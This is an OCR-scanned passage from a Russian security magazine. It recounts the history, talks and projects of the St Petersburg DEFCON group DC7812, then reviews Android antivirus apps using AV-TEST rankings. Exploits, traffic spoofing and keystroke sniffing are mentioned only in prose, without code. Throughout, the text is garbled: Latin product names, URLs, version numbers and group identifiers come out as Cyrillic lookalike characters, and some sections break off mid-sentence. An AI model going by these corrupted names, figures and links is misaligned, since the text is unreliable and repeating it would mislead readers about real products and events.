Воркшоп, где каждый мог сво- 
ими руками попробовать про- 
эксплуатировать уязвимость 
ІіаР в плагине для ІЕ9, при этом 
выполнив атаки как на ОЕР, так 
и на А51-Н (через утечку адреса 
памяти). ОС-7812 практиче- 
ский. 

ОАиіН: ііаѵѵз апсі ргорозаі 
(Егор Хомяков) 

Всем известный парень 
из ѵѵеЬ-зесигііу сцены рас- 
сказал нам об уязвимостях 
РасеЬоок и недостатках ОАиіИ 
даже раньше, чем написал 
себе в блог. ОС-7812 передо- 
вой. 

«ІТАС Рог Оілшпіез (Глеб 
Чербов) 

Глеб доступно рассказал о том, 
что такое иТАС и для чего 
он нужен, и сделал полезную 
лекцию в стиле вводного курса 
для тех, кто хотел бы прикос- 
нуться к теме Пагёѵѵаге-Наскіпд, 
ОС-7812 обучающий. 
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Решили начать с мини-семинаров с веселы- 
ми хак-темами. На коленке в ЫоІерасГе был за- 
мучен веб-сайт. Талантливый дизайнер и просто 
хороший парень за 10 секунд в Раіпі’е придумал 
лого и этот умопомрачительный сіитр-дизайн. 
Также выкатили прототип «агрессивного» хони- 
пота — что называется, для обкатки идеи (мы 
же знали, как люди отнесутся к нашему проек- 
ту, ведь наши парни такие доброжелательные). 
Конечно, наш сайт не остался незамеченным, 
и лучи... добра и поддержки понеслись от наше- 
го любимого комьюнити. 

Тем не менее в Питере обстановка была более 
благоприятная. Наш любимый журнал дал инфо- 
поддержку, ребята с Хабра осветили будущий 
ивент — так что на первую встречу (наша группа 
получила по телефонному коду обозначение ОС- 
7812) в стенах Лесотехнической академии мы 
собрали около двадцати человек. Что уже было 
неплохо. Встреча прошла как мини-конференция 
с тремя докладами, включая доклад про спуфинг 
Яндекс. Пробок и прототип агрессивного хонипо- 
та. Контент первой встречи, как и последующих, 
всегда был на уровне материала, например, таких 
европейских конференций, как ВІаскНаІ. Ровно 
через два года — на ВІаск Наі ЕСІ — эти же темы 
прозвучат уже со сцены в Амстердаме, как про 
спуфинг пробок, так и про агрессивную защиту. 

В частности, Дима Частухин, автор докла- 
да о спуфинге навигационных систем, показал, 
как можно подделывать трафик, генерируемый 
приложениями, и передавать ложную информа- 
цию о координатах и скорости, В качестве демон- 
страции Дима создал пробку на абсолютно пустой 
улице. Поскольку эта информация используется 
навигаторами, то получалось, что можно было ре- 
ально манипулировать трафиком в городе. 

После первой встречи к нам присоединились 
остальные ребята из компании Оідііаі Зесигііу, 
и дальше количество организаторов только 
росло. На вторую встречу пришло уже человек 



сорок. Также мы получили поддержку от вузов 
города, которые с удовольствием нас прини- 
мали, но больше всего порадовало воодушев- 
ление ребят. Это самый ценный опыт. Выражаю 
огромную благодарность тем, кто поддержал 
нас и присоединился к группе именно в стадии 
формирования, — Диме Фёдорову (@русобе), 
Евгению Бечкало (@4екіп), Никите Абдулли- 
ну, Дмитрию Кетову и многим другим, а также 
вузам, что согласились на «непонятно что», — 
Лесотехнической академии, ИТМО, Политеху, 
ИНЖЭКОНу и его студентам, что стали частью 
группы и помогали в сложные времена совер- 
шенно бесплатно. 

Встречалась группа почти каждый месяц. 
И частота встреч напрямую зависит от желаю- 
щих выступить. За одну такую встречу было три- 
четыре выступления, где профессионалы, энту- 
зиасты и любители ИТ-безопасности делились 
своим опытом и идеями. При этом абсолютно 
бесплатно: для всех, кто хочет прийти, двери от- 
крыты. После официальной части всегда насту- 
пала неофициальная часть в баре, так что так или 
иначе идея была удачной. 

ДВИЖУХА 

За короткое время группа обрела свое место, 
и следы первоначального недоверия со сто- 
роны «профи» исчезли. За два года существо- 
вания группы на нашей сцене выступали про- 
фессионалы из таких компаний/организаций, 
какѴапсІех, иипірег, Ыокіа, ОідііаІ Зесигйу, Розійѵе 
ТесНпоІодіез, ОІЧЗес, І_ее1Моге ЗтокесІ Сбікеп, 
а также независимые ребята и просто студен- 
ты. Но главное, что все эти доклады делались 
не с целью пиарить компании, а только как тех- 
нический опыт, проекты, движуха... Это лежит 
в концепте самой группы: 

* Люди, а не компании! 

* Идеи, а не реклама! 

* Общение, а не троллинг. 



* Развитие, а не деградация. 

* Экшн, движуха и рок-н-ролл 8). 

Как бы наивно это ни звучало, но мы ста- 
рались придерживаться этих простых правил. 
Пользуясь случаем, хочу поблагодарить ребят, 
спикеров, которые поддержали эти принципы 
делом и выступлениями с нами: Володю Ворон- 
цова, Юру Гольцева, Дмитрия Олексюка, Никиту 
Тараканова, Александра І_ідйІ[ЕІЧеР6у], Антона 
Карпова и многих других (прям не статья, а набор 
благодарностей како й -то ) . 

Дважды наша группа была в Москве с «вы- 
ездными сессиями», одна из которых прошла 
в офисе Яндекса (спасибо Токсе), а другая 
в МГУ (спасибо рЗіапб) . Мы завязали много но- 
вых знакомств, и наша тусовка перестала быть 
ограниченным множеством по географическим 
пределам. Об этом же говорит и география на- 
ших спикеров: Питер, Москва, Пятигорск, Бер- 
лин и даже Сан-Франциско! Где проходили 
Ое^соп СЗгоир: 

1. Лесотехническая академия 

2. ИТМО 

3. СНАОЗ СОМЗТНІГПОЫЗ 

4. ИНЖЭКОН 

5. Уапбех (Москва) 

6. Лесотехническая академия 

7. ИТМО 

8. МГУ (Москва) 

9. Политех 

10. Политех 

11. Политех 

12. Политех 

13. ЛЭТИ 

14. Ѵапсіех 

15. Бар-клуб КУОТСН 

ПРОЕКТЫ 

Как бы то ни было, одна из целей группы — это 
мотивировать студентов к действию ради опыта. 




ДРУГИЕ ГРУППЫ 

В мире есть много ОС- групп, и многие 
из них устраивают различные ивенты, 
включая конференции. Так, лондон- 
ская группа ОС-4420 — это популярное 
место сбора хакеров. Или, например, 
швейцарская группа ОС-4131 вообще 
проводит локальную крупную конферен- 
цию — НазІЮауз. Только в США было за- 
регистрировано 97 групп! Естественно, 
не все они активные и продуктивные, 
но все же. В остальном мире зарегистри- 
ровано 74, из них две в России: ОС-7812 
и мертворожденная группа из Калинин- 
града (ей также два года, но не было 
ни одного события или строчки). Кроме 
того, буквально «вчера» появилась мо- 
сковская группа, пока ее нет в офици- 
альном листинге, но это вопрос времени. 
Свою первую встречу она планирует про- 
вести уже этим летом — удачи парням! 




Пятнадцатая встреча группы прямо в баре (киОТСН) 








РУ-Ое^соп :) 



четзерг, 26 мая 2011 г. 11:56 



Автор: □тіігу Еѵ*ееѵ 



Видимо оценив успех Розйіѵе Наск Оауз, на этой волне был создан соответствующий сайт 
который посвящен еще более пупыристому мероприятию - Нир://сіе^соП’Ги55іэ.ги/ 
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П Андрей (@рЗ*апгі) Петухов 

В нашем материальном мире 
при мысли о создании площадки 
для выступлений по темам И Б авто- 
матом возникает проблема: как обе- 
спечить качественный контент (см, 
я нормальные спикеры), доступность 

_* _ для широкой аудитории (см. бесплат- 

ный вход), не уйти в минус и одновре- 
менно не продаться спонсорам (см. качественный контент). 
Шах и мат, круг замкнулся. Но не все так плохо: если вы хоти- 
те увидеть луч надежды в этом суровом мире, вы обязательно 
должны попасть хотя бы на одну встречу ОСѲ. На одной такой 
встрече вы увидите больше людей, чем на среднестатистиче- 
ском докладе про СуЬег-суЬег АРТ-АРТ какого-нибудь форума. 
Процент людей, разбирающихся в теме докладов, будет боль- 
ше, чем на любой многопоточной конференции. И это все бес- 
платно. Не бывает? Проверьте сами :). 



Поэтому так или иначе у нас есть проекты, кото- 
рые, как обычно, в полудохпом состоянии и ждут 
своих героев из числа посетителей, сочувству- 
ющих и просто энтузиастов. Например, проект 
по НагОепіпд Сиісіез — собрать описание мини- 
мальных и общих действий по настройке раз- 
личных сервисов и платформ, которые приведут 
к наиболее безопасному состоянию по умолча- 
нию. Причем с автоматизацией проверок таких 
настроек, чтобы деплоить решения можно было 
сразу в наиболее секурном виде. Второй проект 
от @ОМзес_1аЬ посвящен возможности снифа- 
нья клавиатуры с использованием мобильных 
устройств (по анализу вибрации и звука). Кон- 
цепт прост — кидаешь телефон на стол рядом 
с ноутом, человек на ноуте набирает пароль, 
телефон по вибрации понимает, какие конкретно 
клавиши были нажаты (читай подробнее в одной 
из статей номера). Соответственно — нужны 
кодеры и энтузиасты, такую штуку написать до- 
статочно затратно по времени. Третий проект 
уже был в режиме испытания и РоС — агрессив- 
ный хонипот, который контратакует атакующего. 
Результаты этого проекта были представлены 
на ВІаск Наі ЕІ! 2013 и вызвали любопытство 
у некоторых людей. Поэтому имеет смысл до- 
пиливать этот проект в режиме коллективного 
труда. 

Как видно, группа производит контент, кото- 
рый достаточно интересен узкому кругу понима- 
ющих людей. Если ты хотел бы присоединиться 
к чему-либо из перечисленного или если у тебя 
есть даже СВОЯ ИДЕЯ и тебе нужны единомыш- 
ленники — добро пожаловать к нам в группу, вход 
открыт для всех. 



Вот так вот «дружелюб- 
но» нас встретили су- 
ровые профессионалы 
отечественной и Б.. . 



@(І02п рр 

йеісоп Ѳгоир для меня — время и ме- 
сто встреч с товарищами по цеху. Мы 
все раскиданы по Москве и Питеру 
и другим городам, а следовательно, 
редко встречаемся вне конферен- 
ций, ОС-7812 



это что-то среднее 

щшнщ между конференциями и пятничным 

пивом — нет толп непонятных людей, 
каких-то утомительных программ и прочей шелухи, только 
контент. Это гораздо приятнее и проще — эмоционально, во 
всяком случае. Здесь только друзья и знакомые, а также за- 
интересованные люди, которые пришли с определенной це- 
лью — узнать что-то новое, поделиться знаниями. Минимум 
формальностей — это даже слишком лояльное определение, 
здесь формальностей нет вообще (разве что слайды в фор- 
мате группы без логотипов компании на каждой странице, 
но это скорее для удобства и душевного спокойствия — люди , 
а не компании, и это главное). Стараюсь быть на каждой встре- 
че и ни разу не пожалел ни об одной поездке. Отмечу также, 
что технический уровень ОС-7812 очень высок, лучше многих 
конференций, даже международных. Едешь и знаешь — тебя 
удивят и тебе будут рады. Спалить новые векторы до офици- 
ального доклада — нет вопросов, здесь все свои. 



Степан @з1ераН Ильин 

^ Много раз порывался поехать в Пи- 

& 1 тер на очередную встречу ОеІЪоп, 

~ но в итоге был только на двух москов- 

' ских: в уютном офисе Яндекса и ат- 

мосферной аудитории МГУ. Встречи 
ОСО мы поддерживали о самого нача- 
ла. Ведь «Хакер» всегда был проектом 
энтузиастов, и 0С6 — это тоже исто- 
рия про большой энтузиазм. Атам, где энтузиазм, там и много 
всего интересного. Достаточно посмотреть на темы докладов, 
чтобы понять, что на каждой встрече обязательно есть что- 
нибудь достойное. Многие из докладчиков — нынешние авто- 
ры ][, причем некоторых мы заметили как раз благодаря удач- 
ным выступлениям. Впрочем, доклады для меня не главное. 
ЭСЗ — это прежде всего классная тусовка увлеченных людей, 
чертовски приятных и технически подкованных. На обычную 
встречу в баре придут далеко не вое, а вот у ОСО есть особая 
магия, которая способна собрать действительно много людей 
и помочь завести новые знакомства. 



КУДА ЭТО ВСЕ ИДЕТ 

И вот прошло два года. За это время было вы- 
сказано много идей, были обучающие материа- 
лы, воркшопы, конкурсы по взлому механических 
замков, море пива и общения. Все это на абсо- 
лютном энтузиазме авторов контента. Мы хотим, 
чтобы люди присоединялись к нашему движению, 
к проектам, генерировали свой контент, искали 
единомышленников и делились знаниями. Это 
основная идея нашей группы, поэтому — пиши, 
пости, приходи! 1X1 







БОЛЬШОЙ ТЕСТ АНТИ- 
ВИРУСОВ ДЛЯ АЙОВОЮ 

АпсІгоісІ уже завоевал мобильный рынок и с каждым днем 
отъедает очередной кусок у других мобильных систем. 

Это действительно популярная ОС, ворвавшаяся на рынок 
и стремительными темпами захватившая его. Однако где 
есть популярность, а уж тем более монополия, там появ- 
ляются и создатели вредоносного ПО. И обходить АпсІгоісІ 
стороной они даже не собирались. 



ПРЕДИСЛОВИЕ 

Эта статья посвящена антивирусам для опера- 
ционной системы АпсІгоісІ, их классификации, 
особенностям работы и эффективности. Мы со- 
берем все наиболее эффективные антивирусные 
решения и попытаемся выявить лучших из них. 
Однако перед тем, как перейти к тестированию 
и изучению функционала, попытаемся разобрать- 
ся, а нужен ли вообще такой класс приложений, 
как антивирус, в АпсІгоісІ? 

АНТИВИРУС? 

В отличие от той же винды, АпсІгоісІ изначально 
проектировался в расчете на работу в «суровых 
условиях», где вирусы — это обыденная вещь, 



а пожелать завладеть твоими данными может 
даже твоя девушка. Поэтому в АпсІгоісІ была 
встроена многоуровневая защита против различ- 
ного рода угроз. 

В АпсІгоісІ залатаны почти все дыры в ар- 
хитектуре ОС, которые когда-то превратили 
ѴѴіпсіоѵѵз в рай для вирусописателей. Здесь нет 
прав администратора, из-за чего зловред не по- 
лучает желаемого контроля над системой. Здесь 
реализована система привилегий, которая обя- 
зывает приложение явно рассказывать о своих 
будущих полномочиях перед установкой. Здесь 
используется единый источник приложений, ко- 
торый регулярно проверяется на вирусы, а при- 
ложения обязаны быть подписаны цифровой 



подписью, не позволяющей подделать софтину. 
В последних версиях АпсІгоісІ Соодіе реализова- 
ла систему облачной проверки системы на ви- 
русы. 

Но, как оказалось, от заражения вирусами это 
не спасло. Нет, АпсІгоісІ, конечно, не превратился 
в рассадник нечисти под стать винде, но случаи 
заражения имеют место быть. Благодаря системе 
безопасности их не так много, зато каждый из них 
гораздо опаснее ста заражений настольного ПК. 

Там, где ѴѴіпсіоѵѵз- вирус может максимум 
стереть все данные с твоего диска или украсть 
пароль, который потом, возможно, будет исполь- 
зован для чего-то там, вирус для АпсІгоісІ утащит 
твои деньги здесь и сейчас. С помощью звонков 
и ЗМЗ на платные номера среднестатистический 
зловред опустошает мобильный счет букваль- 
но за несколько секунд, а если попадется особо 
глупый пользователь, украдет еще и вновь поло- 
женные на телефон деньги (в некоторых случаях 
и номера кредиток вместе с СѴѴ2- кодами). 

Получается, что, хотя общая вероятность за- 
ражения не так уж и высока, опасность потерять 
реальные деньги вынуждает нас устанавливать 
антивирусы, а иногда даже платить за них. Кстати, 
далее я покажу, что в мире АпсІгоісІ «деньги» вовсе 
не равно «качество». 

ИЗ ЧЕГО ВЫБРАТЬ? 

Итак, антивирус нам нужен. Какой же из десят- 
ков вариантов выбрать? Конечно же, мы можем 
посмотреть в сторону проверенных продук- 
тов известных компаний: Касперского, Ог.ѴѴеЬ, 
Зуплапіес, ІМогТоп и им подобных, но это не со- 
всем верный путь. Дело в том, что Касперский 
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Антидот 



для АпсІгоісІ — это совсем не тот же Касперский, 
который ты привык видеть на своем десктопе. 

Чтобы убедиться в этом, заходим на іѵ-іезі. 
: г , смотрим последний тест антивирусов, вклю- 
чаем сортировку по параметру Ргоіесііоп и... пер- 
вое место — ТгизЮо: МоЫІе ЗесигіТу 1 .3, 100% от- 
лова вирусов, второе место Апііу: АѴІ_ 2.2 — 100% 
отлова. Казрегзку: МоЫІе Зесигііу 10.1 — тринад- 
цатое место, 96% отлова, плюс чрезмерная на- 
грузка на девайс и слишком высокое потребле- 
ние трафика. йг.ѴѴеЬ: апіі-ѵігиз 7.0: 97% отлова, 
девятое место. 

Напомню, что АѴ-ТЕЗТ — это не какие-нибудь 
«Рога и копыта» и не дочерняя компания ТгизЮо; 
это уважаемая некоммерческая организация, 
результатами и наградами которой очень любят 
хвастаться разработчики антивирусов. В основ- 
ном эти ребята делают довольно простую вещь: 
заражают устройство найденными за последний 
месяц вирусами самых различных типов и смо- 
трят на результат поиска с помощью антивируса. 
Так что все объективно и показательно. 



В своем обзоре мы остановимся на первых 
десяти представителях этого списка, в число 
которых попали Віісіеіепсіег, ЗуплапГес, Аѵазі 
и І_оокоіЛ, но остались за кадром Касперский 
и Доктор Веб. Это, кстати, дает тебе как читателю 
право слать мне гневные письма :). 

КЛАССИФИКАЦИЯ 

В общем и целом все антивирусы для АпсІгоісІ 
можно разделить на две группы: 

• собственно антивирусы, единственная задача 
которых — однократная проверка или провер- 
ка по расписанию; 

• МоЫІе Зесигііу — приложения, сочетающие 
в себе функции антивируса, антивора, блоки- 
ровщика звонков, файрвола. 

Тем не менее в большинстве случаев эти гра- 
ницы размыты, и даже самые простые антиви- 
русы обычно включают в себя функции защиты 
от фишинга и, например, блокиратор номеров. 
Из-за этого даже самый хороший продукт может 






превратиться в шлак из-за слишком надоедливо- 
го поведения. Ребята с АѴ-ТЕЗТ такой параметр 
тоже учитывают, как и то, насколько антивирус на- 
гружает систему. 

В моем отборе «лучших из лучших» этот пара- 
метр будет одним из самых важных, так как я счи- 
таю, что каким бы прекрасным, удобным и наво- 
роченным ни был антивирус, он не должен жрать 
память, тормозить систему и постоянно отвлекать 
меня баннерами (Касперский, привет). Если это 
так, то грош ему цена, и я выберу менее надеж- 
ный, но уважительный к пользователю продукт. 

Два других параметра — это функциональ- 
ность и, конечно же, качество отлова. Причем под 
функциональностью я понимаю не просто напич- 
канность всем, что только можно, а то, насколько 
хорошо антивирус выполняет свою основную 
функцию. Тому же АѴІ_ в своем обзоре я ставлю 
высокую оценку, так как, несмотря на полное от- 
сутствие какой-либо функциональности, кроме 
сканирования на вирусы, эту задачу он выполняет 
на все сто. 





ЩРО 



Наиболее прожорливы- 
ми и быстро разряжаю- 
щими батарею антиви- 
русами в тесте АѴ-ТЕЗТ 
оказались Цюкоиі, Е5ЕТ, 
Касперский и МсАІее. 



три§тсоАытіѵши§&мовиЕ§Есиштѵ 1.3.2 



ОС: АпсІгоісІ 2.2 и выше 

САЙТ: ш у уу -ТгиэТа охот 

ЦЕНА: Бесплатно 

Продукт, занимающий верхнюю строчку рейтинга антивирусов 
для АпсІгоісІ с максимальными 13 баллами. АѴ-ТЕЗТ поставила 
ему высший балл по всем параметрам, включая отлов вирусов 
(100%), удобство использования и нагрузку на систему. Прило- 
жение абсолютно бесплатное и без рекламы. Монетизируется 
за счет ненавязчивого предложения установить приложения 
от партнеров (вторая вкладка на главном экране). 

Интерфейс приложения действительно прост, и разобрать- 
ся в нем совсем нетрудно. Главный экран состоит из четырех 
кнопок: «Сканер безопасности», «Менеджер системы», «Защи- 
та конфиденциальности» и «Резервное копирование данных». 
Плюс снизу располагаются два переключателя, позволяющие 
включить защиту от фишинга и сервис отслеживания смартфо- 
на в случае кражи. Для включения последнего нужно обязатель- 
но создать аккаунт на сервере ТгизЮо. 

Нажатием на кнопку «Сканер безопасности» запускается 
проверка на вирусы всех приложений, в конце которой на экран 
будет выведено сообщение о найденных проблемах. Кроме 
вирусов, ТгизЮо также сообщит о приложениях, которые мо- 
гут собирать конфиденциальную информацию или обладать 
серьезными полномочиями. Например, в моем смартфоне 
ТгизЮо нашел игру Оипзіидз, которая собирает информацию 
о смартфоне для вывода более целевой рекламы. Ничего опас- 
ного в ней нет, но задуматься заставляет. 

«Менеджером системы» в ТгизЮо названо окно приложе- 
ния, в котором можно установить лимит на потребление трафи- 
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ка, выявить самые жадные до интернета приложения, оценить 
заряд батареи и количество свободной памяти, а также убить 
приложения для освобождения памяти. Лично я не считаю, 
что антивирус должен обладать таким функционалом, но раз 
есть, так есть. 

Окно «Защита конфиденциальности» содержит в себе спи- 
сок приложений, обладающих полномочиями, которые могут 
быть использованы во вред тебе. К таким полномочиям отно- 
сятся, например, использование ОРЗ, возможность отправки 
ЗМ5 или просмотр контактов. Информация довольно любопыт- 
ная, но совершенно бесполезная. Ну есть у меня 27 приложе- 
ний, которые могут использовать ѲРЗ. Лишить их этой возмож- 
ности я все равно не могу, а удалять не собираюсь. В общем, 
функционал ради функционала. 

Последняя кнопка «Резервное копирование данных» откры- 
вает окно облачного бэкала, но стоит только начать радовать- 
ся, как замечаешь, что в облако можно загрузить лишь список 
контактов, ЗМЗ и журнал вызовов. Зачем это нужно при нали- 
чии аналогичной функции в самом андроиде, совершенно не- 
понятно. Опять же какой-то странный функционал ради функ- 
ционала. 

Если же говорить о ненавязчивости антивируса, то здесь 
все в порядке. Программа спокойненько себе висит в фоне 
и добросовестно проверяет каждую устанавливаемую софтину 
на вирусы. Никаких проблем в работе ОС при этом не возника- 
ет. Потребляет всего 20 Мб памяти. 
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АѴІ. 2.2.23 



ОС: АпсІгоісІ 2.1 и выше 

САЙТ: ѵѵѵѵм.апііу.пеі 

ЦЕНА: Бесплатно 

Этот антивирус занял второе место в рейтинге АѴ-ТЕЗТ, чуть- 
чуть уступив ТгизіСо по части юзабилити. Однако после перво- 
го запуска АѴІ_ ты даже не задумаешься о том, что это один 
из лидеров рейтинга. Интерфейс приложения не выдерживает 
никакой критики. Вместо него здесь какое-то «чудо» дизайна, 
выполненное в режущих синих тонах и с несколькими кнопками 
управления в виде круга. Впрочем, все это легко объяснить тем, 
что это всего лишь «демка», то есть приложение, разработан- 
ное только для того, чтобы продемонстрировать возможности 
антивирусного движка, созданного Ап1іуІ_авз (они продают его 
именно как движок, без интерфейса и всего прочего). 

Понятно, что и функционалом антивирус не блещет. По сути, 
это просто антивирусный сканер, который может либо быть за- 
пущен по запросу для сканирования всех приложений (и 30- 
карты), либо висеть в фоне и проверять устанавливаемые при- 
ложения. Ничего другого АѴІ_ не умеет. 
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ЮОКОЦТ АЫТІѴІГШ8 8.1 2 



ОС: АпсІгоісІ 2.2 и выше 

САЙТ: '.'УУ-./у/. Іоокоиі. сот 

ЦЕНА: Бесплатно / 3 $ в месяц 

Антивирус от еще одного видного разработчика в сфере ІТ- 
зесигііу. Занял четвертое место в списке АѴ-ТЕЗТ по качеству 
отлова, обнаружив 99% вирусов, и второе место по обще- 
му впечатлению от приложения. Продукт, конечно, платный, 
но имеет бесплатную версию с несколько урезанным функ- 
ционалом. 

Бесплатная версия приложения предлагает следующее: 

- Антивирус. Не самый быстрый, но и не самый медленный. 
Выполняет проверку после установки нового приложения, 
а также полную проверку каждую неделю. 

* Резервное копирование. Умеет резервировать список кон- 
тактов на своих серверах. 

• Хороший антивор. В отличие от предыдущего антивируса, 
умеет запускать сирену для аудиального поиска устройства, 
вести журнал перемещений устройства, а также использо- 
вать фронтальную камеру для снимка лица злоумышленника. 
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После покупки Ргетіит-версии появляется дополнительная 
функциональность: 

• Резервное копирование фотографий и журнала вызовов. 
К слову сказать, с первым прекрасно справляется СоодІе+ 
и ЭгорЬох, а второе вообще непонятно для кого нужно. 

■ Возможность заблокировать и сделать удаленный вайп 
с помощью антивора. 

• Встроенная защита от фишинга. 

• И конечно же, наш любимый список приложений с потенци- 
ально опасными полномочиями. 

Завернуто все это в довольно привлекательный и удобный 
интерфейс, которым приятно пользоваться. Сразу после уста- 
новки антивирус запускает проверку и проводит пользователя 



через несколько шагов настройки, включая принудительную 
регистрацию аккаунта. Это, кстати, хорошо, так как защища- 
ет от ситуаций типа «Потом зарегистрируюсь», а телефон по- 
сле этого крадут, и его нельзя отследить без аккаунта на сайте 
Цюкоиі 

Кстати, кроме антивируса, у Боокоиі есть замечательное 
приложение под названием РІап В. По сути, это все тот же анти- 
вор, но который можно установить и активировать уже после 
кражи смартфона. То есть, если вдруг ты по каким-то причинам 
не установил антивор заранее и потерял смартфон, ты можешь 
успеть установить на него РІап В через веб-версию СЗоодІе РІау 
и отправить 5МЗ со словом «Іосаіе» для отслеживания. Глав- 
ное — успеть, пока вор не сменил симку и не сделал сброс 
до заводских настроек. 




шго 

Для тестирования в лаборатории 
АѴ-ТЕЗТ использовался смартфон 
Саіаху Мехиз под управлением 
Апсігоіб 4.1.2. 



В 2013 году в тестировании АѴ-ТЕЗТ участвовало 22 антивирусных продукта, 
и только четыре из них показали степень отлова ниже 90%. В 2012 году из 41 
протестированного антивируса только десять показали уровень детекции 
выше 90%. 
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ВІТОЕРЕЫОЕН МОВИЕ 

8ЕСЦШТУ & Аытіѵтиз і .г.зоз 



ОС: АпсІгоісІ 2,0.1 и выше 

САЙТ: ѵѵѵѵѵѵ. ЫІсІ еТе псіег. сот 

ЦЕНА: 10$ в год 

Этот антивирус от довольно именитой компании Вгісіеіепсіег за- 
нял в рейтинге АѴ-ТЕ8Т третье место со 100% обнаружения ви- 
русов и небольшим минусом за негативное влияние на произ- 
водительность устройства. При этом функционально он близок 
кТшзЮо с тем исключением, что здесь нет менеджера системы 
и сам интерфейс выглядит более опрятно. 

Главный экран приложения содержит пять иконок: «Маіѵі/аге 
Бсаппег», «Арріісаііоп АисІіІ», «ѴѴеЬБесигіІу», «АпІі-ТНеЙ» и «Еѵепі: 
Ѵіеѵѵег». Первая запускает проверку на вирусы (которая, кстати, 
в отличие от первых двух антивирусов, не нашла вообще ниче- 
го подозрительного}. Вторая, по сути, аналог «Защиты конфи- 
денциальности» в ТгизЮо, то есть список приложений, которые 
могут делать «что-то серьезное». Третья иконка открывает окно 
с переключателем, позволяющим включить защиту от фишин- 
га. Четвертое — худо-бедный антивор, позволяющий удаленно 
отследить смартфон, а также заблокировать его или выполнить 
сброс до заводских настроек. 

Стоит все это добро ни много ни мало 10 баксов в год, три- 
альная версия работает две недели. Покупать этот комплект 
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я бы не рекомендовал, потому что его компоненты можно уста- 
новить отдельно и абсолютно бесплатно. Например, тот же 
антивирус и антивор, без лишнего балласта в виде тупого функ- 
ционала. 




ЫОНТОЫ МОВИЕ ЗЕСІІПІТѴ 3.3.4.970 



ОС: АпсІгоісІ 2.2 и выше 

САЙТ: ѵуу.'ѵу .погШп . с от 

ЦЕНА: Бесплатно / 900 руб. 

Продукт компании ЗуплапТес занимает в рейтинге АѴ-ТЕ8Т пя- 
тое место с отловом 98% вирусов. Функционально он повторяет 
все предыдущие антивирусы, но, кроме всего прочего, включа- 
ет в себя еще и блокиратор звонков. Распространяется в двух 
версиях: «антивирус + анти вор» либо полный комбайн стоимо- 
стью 900 рублей. 

Интерфейс приложения очень прост и прямолинеен, 
за что и получил высший балл от АѴ-ТЕЗТ. Главный экран со- 
стоит из шести «тайлов», в которых располагаются следующие 
функции: антивирус, антивор, резервное копирование, блоки- 
ратор вызовов, защита от фишинга и ссылка на другие норто- 
новские приложения в маркете. Проверка на вирусы, как всег- 
да, проводится при установке новых приложений, раз в неделю 
и принудительно, при нажатии на соответствующий тайл. 

Антивор достаточно стандартный, с возможностью отсле- 
живать смартфон на карте в бесплатной версии, плюс «сирена», 
удаленное блокирование и вайп, а также возможность послать 
сообщение человеку, нашедшему смартфон, — в платной. 
Как всегда, можно сделать бессмысленное резервное копиро- 
вание контактов и воспользоваться антифишинговой функцией 
с предупреждением о небезопасных сайтах. Отдельно можно 
отметить встроенный блокиратор звонков и ЗМЗ, доступный 
за деньги. 

В общем, ничего особенного, за исключением действитель- 
но удобного и лаконичного интерфейса, выполненного по всем 
правилам Ноіо. За него я бы действительно поставил пять. 
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Кстати говоря, в маркете есть еще несколько интересных 
нортоновских утилит. Например, безопасный сканер штрих- 
кодов ІЧоіТоп Зпар, который не просто расшифровывает ОН, 
но и проверяет хранящуюся в нем ссылку на безопасность. Или 
ІЧогТоп НаІІ:, защищающий от недавно найденных критических 
багов, таких как возможность обхода блокировки экрана или 
баг в драйвере процессора Ехупоз 4. Антивор также распро- 
страняется отдельно, в пакете Ыогіоп АпІі-ТГіеИ:. 



Интерфейс АѴЬ 2.2.23 не выдерживает никакой критики. Вместо него здесь 
какое-то «чудо» дизайна, выполненное в режущих синих тонах и с нескольки- 
ми кнопками управления в виде круга 
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Подробное описание 
методов тестирования 
антивирусов в АѴ-ТЕЗТ: 

Результаты тестирова- 
ния в формате РОР: 



АѴА8Т! МОВИЕ ЗЕСЦШТУ 2.0.4400 



ОС: АпсІгоісІ 2.1 и выше 

САЙТ: ѵѵѵіЛЛ/.аѵазТ.ш 

ЦЕНА: Бесплатно 

Антивирус Аваст делит с Нортоном шестое место с рейтингом 
отлова 98%, но, по словам АѴ-ТЕЗТ, проигрывает ему по влия- 
нию на производительность устройства. В нашем обзоре {да 
и в сравнении с 95% других антивирусов) это самый нашпи- 
гованный функциональностью продукт. Подумай только, в него 
включены такие компоненты, как антивирус, советник по без- 
опасности (аналог той самой «Защиты конфиденциальности» 
из ТгизіСо :)), менеджер приложений, фильтр 8МЗ и звонков, 
брандмауэр, счетчик трафика и лучший из до сих пор виденных 
мной антивор. При этом упаковано все в довольно приятный 
и удобный в использовании интерфейс. 

Начнем с антивируса. Как и везде, он может быть запущен 
принудительно, раз в неделю, а также будет сканировать уста- 
навливаемые приложения и все, что ты закинул на карту па- 
мяти. Можно назначить автоматическое сканирование по рас- 
писанию на любое время и день недели. Само сканирование 
довольно быстрое и не особо нагружает систему, при этом 
ты можешь гибко управлять поведением сканера с помощью 
меню «Управление экраном». Например, можно отключить про- 
верку на вирусы устанавливаемых приложений или разрешить 
сканирование только устанавливаемых вручную либо читаемых 
с карты памяти файлов. 

Фильтр звонков и ЗМ5 позволяет создавать группы або- 
нентов и блокировать их по расписанию, например блоки- 
ровать ЗМЗ по работе в выходные дни или звонки от друзей 
в рабочие часы. Все реализовано действительно качественно 
и без «пропуска первого гудка». Телефон глушится полностью. 
Для гооі-юзеров доступен простой брандмауэр, позволяющий 



блокировать доступ к определенным типам интернет-связи 
для отдельно взятых приложений. По сути, это полный аналог 
ОгоісІѴѴаІІ. 

Также в Аѵазі доступны счетчик трафика, веб-фильтр (ан- 
тифишинг) и менеджер приложений на манер встроенного 
в АпсІгоісІ. Однако самая сильная часть этого антивирусно- 
го пакета — антивор, который здесь реализован так, как это 
и должно быть. Функционально он не особо превосходит свои 
аналоги из других антивирусов, позволяя отслеживать поло- 
жение устройства, включать сигнализацию, делать удаленный 
вайп и блокировку, а также слать управляющие ЗМЗ с заранее 
заданного доверенного номера. 

Интересно в нем вовсе не это, а способ установки в систему. 
В других антивирусах антивор реализован как часть приложе- 
ния, а потому легко отключается простым удалением софтины 
(или вайпом, если софтина имеет защиту от удаления). В Аваст 
антивор — это отдельное компактное приложение, которое 
устанавливается при активации соответствующей функции. 
И можно его не только установить как простое приложение, 
но и прописать в системный раздел (вместе с настройками), за- 
щитив таким образом от удаления даже с помощью вайпа. 

При этом пользователю доступно несколько опций, напри- 
мер возможность автоматически установить антивор с помо- 
щью прошивки через консоль восстановления для устройств 
с защитой системного раздела (3-ОИ) или же, если смарт- 
фон полностью разлочен, просто скопировать пакет в каталог 
/зузіет. Для пользователей СуаподепМосІ доступна опция, 
